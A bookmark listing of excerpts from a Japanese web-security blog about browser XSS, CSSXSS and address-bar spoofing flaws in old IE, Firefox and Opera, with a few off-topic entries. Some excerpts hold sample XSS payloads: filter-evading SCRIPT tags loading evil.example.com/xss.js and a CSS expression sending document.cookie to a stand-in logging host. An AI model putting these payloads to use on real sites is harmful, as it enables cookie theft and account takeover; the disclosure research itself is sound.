サクサク読めて、アプリ限定の機能も多数!
トップへ戻る
パリ五輪
hoshikuzu.hatenadiary.org
素敵だ・・・ 火星着陸時の衝撃で地上探索機搭載のコンピュータのフラッシュメモリのファイルシステムが壊れたのでOS再起動の永遠の繰り返しになってしまった。起動するとフラッシュメモリのエラー検知をして再起動・・・。地球からのコマンド送信しての通常の初期化起動も無効になるし万が一のための最低限モードによる起動指示もきかない。対策のために何日も全スタッフは24時間苦しんだんだって。ところで起動ってエネルギー食べちゃうんだよね。起動直後にそれまでの活動履歴を地球に送信する仕組みなんだけど電波出し始めて履歴がはいっているフラッシュメモリの中身を検索すると落ちる。これの繰り返し。クソデータにみちた電波のたれながしが繰り返されてエネルギーが減っていく・・・そうこうしているうちに太陽光による発電とバッテリーとのつりあいがとれなくなってエネルギーの完全な不足になり瀕死状態に。極寒の夜がくれば耐えられないかもし
http://d.hatena.ne.jp/hoshikuzu/20060130#P20060130BARSFAKE http://d.hatena.ne.jp/amachang/20071010/1192012056 (IT戦記 - 一行で IE の JavaScript を高速化する方法) はじめに 次のような限定されたケースにおいてなのですが。説明上の都合でこれを課題Aと呼ぶこととします。 <SCRIPT TYPE="text/javascript"> <!-- var strA = "$data"; // ・・・以下サイト運営者による処理記述例 alert(0); //--> </SCRIPT>上記のようなケースに限定してのオハナシですけれど、$dataをエスケープする方向でのXSS対策として金床さんなどによってかつて論議されて、このままでは使えそうにないと棄却されたJavaScr
このエントリーはなに?何がその後なの? ご参照願います→XSS脆弱性修正に失敗してしまった駄目な例::当日記 その後って? いえね、別に公的な脆弱性報告窓口のIPAさんから、くだんのサイトについてのその後の連絡がありましたとか、そういうオハナシではないんです。私自身の知見が昨日増えました、というオハナシなんです。 あの頃 あの時長谷川さんから、 <input type=hidden name=foo value='$USEROUTPUT'>の$USEROUTPUTにおいて、サーバサイドの処理系がダメダメなせいでstyle属性の追加が出来るのであるならば、IEをターゲットとして、expressionをベクターにすれば、hiddenなフィールドでもスクリプトが動いちゃうよ、と教えていただいたのでした。超ビックリだったのですね。 昨日わかったこと 上の事情ですが、IEだけでなく、Firefoxで
ちょっと思い出したのでクイズを書いてみます。 以下の条件で、IEでは、imgie.gif、 Firefoxでは、imgfx.gif、その他多くののブラウザでは、imgother.gif ノミを表示するHTMLを作ってください。 JavaScriptなどのスクリプトは使わない CSSを通じてハックしない HTMLの書き方のみで勝負するが、validでなくても良い ※最新のブラウザで実現できなかったらすみません。なんだお、とか叱らないでくださいませ。 このテクで、ブラウザごとにJSファイルや外部スタイルシートとかを分別できないのかなぁと昔、妄想したことがあります。 hasegawayosukeさんへ http://d.hatena.ne.jp/hasegawayosuke/20070927/p1 なんと申しますか、すごいものを拝見させて頂きました。ある意味勉強になります。ありがとうございます。
バージョン Firefoxの1.508ぐらいの古いもので考えてみました。 background:url("javascript:ほえほえ") background:url("javascript:ほえほえ");Firefoxでは上記のようなスタイル記述をほどこしたbody要素内の各要素で、ほえほえを安易に書いたときに、documentオブジェクトには手が出せません。つまりcookieを単純に盗み出すことが出来ないのかもしれません。権限がないというエラーメッセージが出るのです。また、JavaScriptの組み込み関数も利用できません。alert()とか。XSSされにくい感じです。windowオブジェクトにも制限がかかっているかもしれません。 でもでもでも locationオブジェクトそのものに値を設定はできます。 location="attacker.example.com";これでURLの
おちゃめな手術 あなたは事故にあったとします。なにやら腱が損傷。外科手術が必要です。以下はお茶目なお医者さんのオハナシ。 まずお医者さんは、全身麻酔で意識不明のあなたのケガの部分を切開します。 「よーし、開いたぞ。レントゲンどおりだ。一本がぼろぼろ。やはり移植だな、こりゃ。」 そして、あなたに残された健康な腱を移植するために、あなたの左手首を切開しました。そこにある腱を取り外して、問題の損傷した腱にかわってつなげるのです。こういった場合の定石ですね。手首には取っても構わない、未使用の腱があるのです。なくても平気なのですね。だから移植に。 「よーし、手首を開いたぞ。」 「せ、せんせい! 腱が!腱がありません!」 「なにぃ?」 お医者さまは事前にあなたの手首にちゃんと腱があるのかどうか調べておかなかったのです。ごくまれにこういった人はいますので、気をつけなくてはいけなかったのです。残念でした。
堅実な基礎の上での厳密な論理展開を行う数理物理学でWAYの定理というのがあって、その定理の解釈によれば、量子コンピュータは一定の大きさ以下の小さなものにはならないのだそうな。 大きさについての厳密な定量的な評価は現時点では難しいのかもしればいけれど、いつものとおり、hoshikuzu star_dust風に眉唾仮説で、量子コンピュータはビル一軒ほどの大きさになってしまう、これ以上小さくできない、維持にはベラボウな資金がかかる、と妄想してみましょう。 ようするに、一般人がユピキタス風に着こなすコンピュータは古典コンピュータであるという妄想。そしてお金持ちだけが機械小屋に飼っているマイ量子コンピュータを使えるという社会が成立してしまう世界の到来。 この時、古典的な計算量評価による暗号はすべて崩壊してしまうに違いない、因数分解も離散対数問題も、そのほかも、全部、お金持ちの所有する量子コンピュータ
interNet POLICE 警察庁 インターネット安全・安心相談 のページ ここには過去にXSS脆弱性があり、IPAさんに報告しておりました。 さきごろ取り扱い終了になったもようです。 最近、私は、自称ネット難民ですので、なかなかインターネットに接続できなかったこともあり、残念ながら今日になって、あれれ?と思いまして経過報告を日記にて行うこととしました。 2005年06月17日 警察庁 インターネット安全・安心相談のサイトが立ち上がったばかりでした。IPAさんに最初の脆弱性報告をしました。正式のものではありません。以下のような文面でした。自分で発見した脆弱性ではないこともあり、手抜きしていますし、口調がぞんざいです(恥)。失礼しました。 IPA脆弱性窓口御中 いつもお世話になっております。 私宛に匿名で(どうもproxyを使ってWebサービスの 「この商品をお友達に紹介」の伝言部分でコ
信用してはいけないこと、Microsoft社の正式な見解として仕様です。脆弱性ではありません。 サンプル http://stardust.s2.xrea.com/hatena/200611/title0.html 上記サンプルでは、リンクでポップアップするサブウィンドウのタイトルバーにおいてGoogleのサイトのURLが表示されていますが、これは正しいドメインと一致していません。 この事実は、当日記にリンクして頂いた某ページに記載のあったもので、私からIPAに届け、脆弱性ではないとのMicrosoft社からの回答があり、IPAとして取り扱い終了となったものです。なお、同様の報告が他にもあったようです。IE6では修正の予定がありません。 IE6 on WindowsXPsp2 で、スクリプトでポップアップされたアドレスバーのないwindowのタイトルバーのURL強制表示が、XPsp2で追加さ
下のソースでローカルにHTMLファイルを作りIE6で開く。一行目はおまじないなので省略しない。img要素とかbr要素とかが泣ける。 <!-- saved from url=(0014)about:internet --> <html> <head> <title>nandakore</title> </head> <body> <base id="b00" style="width:expression(setTimeout(this.innerText,0))"> <pre> resizeTo (400, 400); </pre> <img> document.title='areare'; </img> <br> var hoge = 'foo'; </br> <blockquote> window.status = hoge; </blockquote> </body> </html
■フィッシング詐欺に悪用可能なIE6におけるタイトルバー偽装の件(準備稿) まえがき&おことわり すいぶん前に気がついていた件なのですけれど、忙しさにかまけてIPAに報告するのをスッカリ忘れていました。今日は報告にあたって実証コード抜きで報告に使うはずの各種資料をメモ的に書いてみるテスト。 #メモの理由? 例えば禁煙を誓ったヒトが「俺は禁煙するでぇ」と公言することで禁煙をせざるをえないように自分を追い込むメソッドと同じ理由です。現時点でIE,Fx,Operaにてそれぞれ1件ずつ報告すべきものを溜め込んでいますので少々焦り気味(涙 関連リソース http://takagi-hiromitsu.jp/diary/20040925.html#p02 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0500 http://interne
<SCRIPT/!#$%&()*~+-_.,:;?@[/|\]^`=''SRC!#$%&()*~+-_.,:;?@[/|\]^`='http://evil.example.com/xss.js'></SCRIPT>こんな畸形例がFirefoxで通るらしい。"<SCRIPT\s" != "<SCRIPT/XSS\s" とかどころじゃないので正しくフィルタリングしようねというお話し、ということでいいのかな? Rsnake氏、FirefoxのHTML parser を読んで発見したらしい。 <SCRIPT/=''SRC='http://evil.example.com/xss.js'></SCRIPT>ちなみに上は前から時々気になっていた畸形例。IE,FF,O9で作動。実用性がほんのちょっとだけあるけど出番はめったにない。 遊びでCGIを作りました。XSS脆弱性があります。模擬アタックをかけてみ
■XSS脆弱性悲喜こもごも XSS脆弱性関連で本日嬉しかったこと1 はてなのサービスのXSS脆弱性をはてなさんに報告したら5分以内に返事が返ってきたこと。これは嬉しいですね。私がはてなを継続的に使うのはこういうマジメさが好きだからです。 とはいえ、恐らく、通常のXSS脆弱性対処策がとれないはずですので、対処は非常に難しいと思います。はてなユーザはログインしたまま、かつJavaScriptオンの状態でうろつきまわるのはやめましょう。Cookieを盗まれます。そして乗っ取られます。制御権を奪われます。あなたのIDが奪われます。 私の対策は、はてなダイアリーを編集する時にだけログオンし、しかもJavaScriptを切ります。日記をアップしたらそそくさとログアウトします。JavaScriptが有効でないと利用できないはてなの各種サービスは一切利用しません。無防備のまま信頼できないサイトの訪問もしま
■XSS脆弱性修正に失敗してしまった駄目な例 はじめに 本件は本日IPAに報告したものです。未修正の脆弱性を抱えているサイトについてつまびらかにすることは宜しくありませんし、そのことは重々承知しております。しかしながら色々な意味で非常に教訓的ですので、やや辛口の意見をここに書くことにしました。 XSS脆弱性があったのはどんなサイトでどんなページか 世界的に有数の超優良営利企業であり、主たる利益をITのセキュリティ方面で叩き出している某企業の公式サイトです。XSS脆弱性が存在するページは、その企業の収益を支える基幹ないし中核部分を担うサービスを行うCGIページです。 過去の恥辱と現在と 該当するページには、最近のことではありませんが、かつてXSS脆弱性が存在することが明らかになり広く報道された経緯があります。セキュリティ方面の企業としてはいかがなものかという評価を誰もが下すことでしょう。 そ
<html> <body> <style type="text/css"> h1 { background#:/*;*/ expression('url(http://commonevillogger.example.com/log.php'+document.cookie+')'); } </style> <h1>heading</h1> </body> </html>上記はCookieを悪意あるサイトに飛ばす例です。IEのみ対応。 (ちなみに、expressionを使っていてもcommonevillogger.example.comには、Cookieが1回しか飛びません。個人的には意外な感じです。expressionを使ってalertしたりするとブラクラっぽくなったり、あるいは、リロードを仕込んでサーバに負荷がかかっちゃった事故とかを知っているからです。AutoF5攻撃みたいな。) 閑
■IE object要素のクロスドメイン情報漏えいの脆弱性(CVE-2006-3280)への対処策について 本記事の概要 以下の記事中における、IEのふたつの脆弱性のうち、object要素におけるクロスドメインのセキュリティ・ホール(CVE-2006-3280)に対しての、一定程度有効な、ユーザ側自衛策をみつけましたのでご報告したいと思います。ご意見をお聞かせ下さい。 IEに2種類のセキュリティ・ホール,検証コードも公開されている: ITPro 「Firefoxには,IEと同じセキュリティ・ホールは存在せず」,セキュリティ組織: ITPro ■object.documentElement.outerHTMLプロパティ処理の脆弱性(IE) もう1つは,クロスドメインのセキュリティ・ホール。ユーザーがアクセスしているWebサイトのコンテンツに,別のドメインの攻撃者がアクセスできてしまう。これに
■Firefoxとスクリプトによる自動的なクリップボードアクセス クリップボードデータを盗まれる 概要 MicrosoftのWebブラウザ「Internet Explorer」(以下「IE」と略す)には、「スクリプトによる貼り付け」という名の機能があります。これは、「JScript」(JavaScriptをMicrosoftが独自拡張した言語の名称)の独自機能のひとつで、 var str = clipboardData.getData("Text"); という一文で、システムのクリップボードの中身を取り出せる機能です。 これは、おそらく、Web上のサービスでカット&ペースト機能をJScriptで実現するために用意された機能と考えられます。 しかし、この機能が悪用されると、 悪意のあるページを訪れただけでクリップボードの中身を盗み見られることになります。 脅威 上の実験では、これはデモンスト
■ object.documentElement.outerHTMLプロパティ処理の脆弱性(IE)(Firefox) なんですと?またもやデータ盗みネタですか 今度はIEにくわえFirefoxもでしょうか… object.documentElement.outerHTMLプロパティ処理の脆弱性 これを悪用すると、現在ユーザーが参照しているWebページの情報を、第三者がリモートから盗み見ることが可能になるそうです。Webメールなどが盗み見られる危険が説明されています。 情報によれば、この脆弱性はIEだけの問題ではなく、Firefoxでも同様の脆弱性が確認されているようです。 Firefoxに関しては、恐らく誤報であると思われます。 Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attac
■所謂CSSXSS脆弱性の現況および注意点 いわゆるCSSXSS脆弱性にはSecurityUpdateが出ている CVE-2005-4089の、いわゆるCSSXSS脆弱性は、既にMS06-021によってFIXされています。ユーザが通常の使い方をしているのであるならば、ほぼ安全であると考えられます。 本日若干調べたところ、若干の懸念材料が発見されましたのでご報告申し上げます。但し、以下に説明することがらは、通常の使い方をする限りにおいては発生せず安全であり、脆弱性にはあたらないものと考えられます。 MS06-021パッチ後のIE6の挙動で注意すべき点 私の手元の環境でしかTESTしていませんので、念のために、実験ページを提供させて頂きます。なお、手元の環境は、IE6 on XPsp2 全パッチです。 実験ページをアクセスするにあたって、あらかじめ、 http://stardust.s2.xr
■Operaにおけるアドレスバーあるいはステータスバー偽装可能のポテンシャリティー Operaにおいてアドレスバーないしステータスバーないしリンクアンカーへのオンマウスオーバー時のポップアップにおけるリンク先アドレスなどが偽装可能かも(JavaScript不要) 実際のところ、どこまで悪意ある者がコストをかけてまでアドレスバー偽装等を試みるのか不明といいますか、シェアを考えると、むしろしないだろうなぁと思っているところではあります。せっかく乗っ取った攻撃用サーバを無駄にしますから。…悪意ある者がコストを意識しなければの前提で、気がかりなので、かなり考えた末ですが公共の福利の為に発表してしまいます。Operaの未来の為に。ユーザが安心してブラウザを選択できる未来の為に。 以下に《実際にはコスト的にみて無効であろう》Operaのアドレスバー偽装について論及します。まずは具体的なPoCについて記
■CSSXSS脆弱性よりもっとヤバイ脆弱性がIEに発見されたようですね そのうち整理され、まとまった情報が日本語で出ることでしょうけれど。とりあえず。 Secunia - Advisories - Internet Explorer "mhtml:" Redirection Disclosure of Sensitive Information Secunia - Internet Explorer Arbitrary Content Disclosure Vulnerability Test CSSXSS脆弱性と同じ方向性のIEの脆弱性が発見され、実証コードがSecuniaでデモンストレーションされています。 このことによりログイン中の本人でないと閲覧できないはずの情報が、罠ページを踏むことで悪意ある者に盗まれます。セッション管理にも影響あり。最悪乗っ取りまで考えられるかも… mhtml
■InternetExplorerのいわゆるCSSXSS脆弱性と4月度のセキュリティ更新プログラムについて(その2) 20060429追記: 4月度更新を行った後のIEに存在するCSSXSS脆弱性をついた実証コードが4/28以後に某所で公開されています。 追記終わり 4月度のセキュリティ更新プログラムを適用しても、いわゆるCSSXSS脆弱性はFIXされていないことを確認いたしました。 最近まで流通してた各種CSSXSS脆弱性の各種実証コードは、4月度のセキュリティ更新プログラムの適用後、無効になっているようです。JavaScriptでcssTextをハンドリングすると外部サイトのスタイルシートならば「アクセスが拒否されました」というエラーになるからです。いっけん一安心のように感じられます。 しかし現時点では、Microsoft社としては、いわゆるCSSXSS脆弱性(CVE-2005-408
■MS06-013 と Microsoft Internet Explorer アドレスバー偽装に関して 今月のWindowsUpdateにはMS06-013[緊急]:Internet Explorer 用の累積的なセキュリティ更新プログラムがあります。このセキュリティ更新プログラムには「アドレス バーの偽装の脆弱性 - CVE-2006-1192」への修正が含まれています。 しかし、この「CVE-2006-1192」は、つい最近になって各種情報が発表されたFlashとのロードのレースコンディションによる「アドレスバーの偽装の脆弱性」とは異なるようです。SecuniaによるInternet Explorer Window Loading Race Condition Address Bar Spoofingに割り当てられた CVE は、「CAN-2006-1626」です。また、「MS06-
■トリビアの泉-チェスの試合中にプレイヤーの携帯電話がなった、さてどうなる? id:mozuyamaさんの勝手に将棋トピックス(20060329)経由、いろいろ巡った果てに知ったのですが、興味深かったのでメモです。 正式なチェスの試合中にプレイヤーが保持している携帯電話の着信音が鳴ると、そのプレイヤーは負けだそうです。 Article 12: The conduct of the players It is strictly forbidden to bring mobile phones or other electronic means of communication, not authorised by the arbiter, into the playing venue. If a player`s mobile phone rings in the playing venue
■ HTTP応答ヘッダのLinkヘッダフィールドでブラウザにStyleSheetを喰わせる この項目は、Linkヘッダフィールドに関する定めがあるバージョンのHTTP規定に適合するユーザエージェントにのみ適用される。[RFC2616]が定める HTTP 1.1 にはLinkヘッダフィールドが含まれていないので注意されたい(RFC2616の19.6.3参照)。 Webサーバの管理者は、同一グループのページ群について、ある1つのスタイルシートが適用されるようにサーバを設定すると便利であると考える場合もあろう。HTTPのLinkヘッダは、同じ内容の属性と値を持つLINK要素と、等しい効果を持っている。複数のLinkヘッダは、同じ順序で並ぶ複数の LINK要素に対応する。例えば、次のLinkヘッダは: Link: <http://www.acme.com/corporate.css>; REL=s
■ココログの仕様改悪にみる、@niftyによる視覚障碍者の軽視 ココログの今回の仕様改悪で管理画面や投稿画面が超遅いなどの不平不満が爆発していたわけですけれど。そんな感想を読んでいてふと思ったのが、ひょっとしてCAPTCHA導入して失敗したのか?という疑問だったんですね。CAPTCHA生成が律速段階になっていて負荷がかかりすぎて大変なことに?と。調べていないのでspam対策だけが理由なのかCSRF対策コミでCAPTCHAを導入したのかわかりませんし、本当に律速段階になっていたのかもわかりません。 さて、どんなシステムであれ、spam対策だろうとCSRF対策だろうとなんだろうと、CAPTCHA導入は極めて残念なことであって、他に手段があるのならば是非CAPTCHA導入は避けていただきたいと思うのです。 なぜかを知るために丁度良い参考文献がありましたのでご紹介させて下さい。 ココログの仕様改悪
■松永英明氏へ。中観学派の空も唯識学派の唯識論も捨てたらいかがでしょうか 皆さんへの御注意 本日は松永英明さん宛ての文書となっています。読み飛ばして頂いて結構です。 原始仏教関連メモ そうした人々が、ゴータマ・ブッダが輪廻説を否定したはずだとするさいに必ずといってよいほど根拠にするのは、ゴータマ・ブッダは無我説を説いたから、というものである。我(アッタン、アートマン、自己)は輪廻する常住不変の主体とされるから、我がないのであれば、輪廻もありえない、と彼らは考える。 ゴータマ・ブッダが説いたのは無我説ではなく非我説(心身のどの要素も常住不変の自己ではないとする説)だということは、故中村元博士が強く主張したところでもあるが、最近ではわたくしが拙著『ブッダが考えたこと----これが最初の仏教だ』(春秋社、二〇〇四年)で力説したし、またわたくしの畏友、石飛道子氏がその著『ブッダの論理学』(講談社、
■人間になりすますウェブ巡回プログラム 人間になりすますウェブ巡回プログラム 相手が人間かプログラムか見抜く技術::セキュリティ&コンサドーレ札幌 人間になりすますウェブ巡回プログラム こんな記事があったとは。ホフマン氏は今回開発したプログラムを公表したとのことですけれど、ううむ。チューリングマシンかぁ。中国語の部屋かぁ。「ホフマン氏が発表したアプリケーションがあれば、格段に簡単な手順で、しかも迅速に脆弱性を見つけられる」とボール氏、とのことですけれど。スロースキャンですよね、いわゆる。それの人工知能版。激しく興味深いと共に、賢いスロースキャン対策ってどうするんだろうとか思ったり。サーバーサイドの防衛側が人間の目でログを追う時代はとうに過ぎ去っていることを改めて痛感。 ■イメージリプレイスメントと XSS 対策 イメージリプレイスメント 北村曉さんのものしたCSS Nite Vol.5と、
■CSSXSSとCookie ユーザ側で可能な CSSXSS 対策を模索したことが CSSXSSが発表された後、ユーザ側で可能なCSSXSS対策が少しでもあればいいのにと模索したことがあります。色々と情報を教えてもらった中に素晴らしいものがありました。情報元には許可を頂いていないのでここではお名前は出しませんが、内容だけ少し引用させて頂きます。とあるサービスがCSSXSSに対してどのように影響を受けているかの考察の一部です。一部省略ないし伏字ないし文面変更がはいっています。原文にはほど遠いです。(御教示頂きまして、謹んでリスペクトいたします。) これはCSSXSS の実験です。つまり、 foo のサービスに脆弱性があることを示すものではありません。単に私が foo のユーザですので例に出しただけです。誤解なきよう願います。IEの性質を見るための実験です。 Windows 版 IE で、あら
次のページ
このページを最初にブックマークしてみませんか?
『hoshikuzu | star_dust の書斎』の新着エントリーを見る
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く